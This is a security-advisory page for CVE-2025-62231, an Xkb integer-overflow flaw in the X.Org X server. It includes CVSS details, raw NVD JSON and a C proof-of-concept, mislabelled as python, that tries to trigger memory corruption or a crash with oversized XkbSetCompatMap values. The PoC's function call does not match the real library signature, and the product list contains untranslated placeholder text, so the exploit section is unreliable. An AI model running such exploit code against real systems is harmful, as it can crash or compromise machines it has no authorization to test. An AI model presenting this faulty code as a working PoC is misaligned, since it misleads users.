Security Vulnerability Report
中文
CVE-2025-62231 CVSS 7.3 HIGH

CVE-2025-62231

Published: 2025-10-30 05:15:39
Last Modified: 2026-04-20 14:16:16
Source: [email protected]

Description

A flaw was identified in the X.Org X server’s X Keyboard (Xkb) extension where improper bounds checking in the XkbSetCompatMap() function can cause an unsigned short overflow. If an attacker sends specially crafted input data, the value calculation may overflow, leading to memory corruption or a crash.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H

Configurations (Affected Products)

No configuration data available.

X.Org X Server < 修复版本 (所有受影响版本)
Red Hat Enterprise Linux 7.x
Red Hat Enterprise Linux 8.x
Red Hat Enterprise Linux 9.x
Fedora (受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62231 PoC - XkbSetCompatMap Integer Overflow // Author: Security Researcher // Target: X.Org X Server X Keyboard Extension #include <X11/Xlib.h> #include <X11/extensions/XKBgeom.h> #include <stdio.h> #include <stdlib.h> // Xkb compatibility map request structure typedef struct { unsigned char reqType; unsigned char xkbReqCode; unsigned short length; unsigned char deviceSpec; unsigned short firstSI; unsigned short nSI; unsigned char flags; unsigned char pad; } xkbSetCompatMapReq; int trigger_overflow(Display *dpy, int device_id) { XkbDescPtr xkb; // Initialize XKB extension if (!XkbQueryExtension(dpy, NULL, NULL, NULL, NULL)) { fprintf(stderr, "XKB extension not available\n"); return -1; } xkb = XkbAllocKeyboard(); if (!xkb) { fprintf(stderr, "Failed to allocate keyboard\n"); return -1; } // Trigger integer overflow by setting large nSI value // This causes unsigned short overflow in XkbSetCompatMap Status status = XkbSetCompatMap(dpy, device_id, XkbCompatMapMask, // flags xkb, 0xFFFF, // firstSI - large value 0xFFFF); // nSI - triggers overflow (0xFFFF * sizeof(some_struct)) if (status != Success) { printf("CompatMap update failed (expected with overflow)\n"); } XkbFreeKeyboard(xkb, 0, True); return status; } int main(int argc, char **argv) { Display *dpy; const char *display = getenv("DISPLAY"); if (!display) { display = ":0"; } printf("[*] CVE-2025-62231 PoC - XkbSetCompatMap Integer Overflow\n"); printf("[*] Target: %s\n", display); dpy = XOpenDisplay(display); if (!dpy) { fprintf(stderr, "Cannot open display\n"); return 1; } printf("[*] Triggering overflow...\n"); trigger_overflow(dpy, XkbUseCoreKbd); XCloseDisplay(dpy); printf("[*] Done\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62231", "sourceIdentifier": "[email protected]", "published": "2025-10-30T05:15:39.120", "lastModified": "2026-04-20T14:16:15.933", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was identified in the X.Org X server’s X Keyboard (Xkb) extension where improper bounds checking in the XkbSetCompatMap() function can cause an unsigned short overflow. If an attacker sends specially crafted input data, the value calculation may overflow, leading to memory corruption or a crash."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:19432", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19433", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19434", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19435", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19489", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19623", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19909", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:20958", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:20960", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:20961", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21035", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22040", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22041", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22051", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22055", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22056", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22077", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22096", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22164", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22167", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22364", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22365", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22426", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22427", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22667", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22729", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22742", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22753", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0031", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0033", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0034", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0035", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0036", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-62231", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402660", "source": "[email protected]"}, {"url": "https://lists.x.org/archives/xorg-announce/2025-October/003635.html", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/28/7", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00033.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.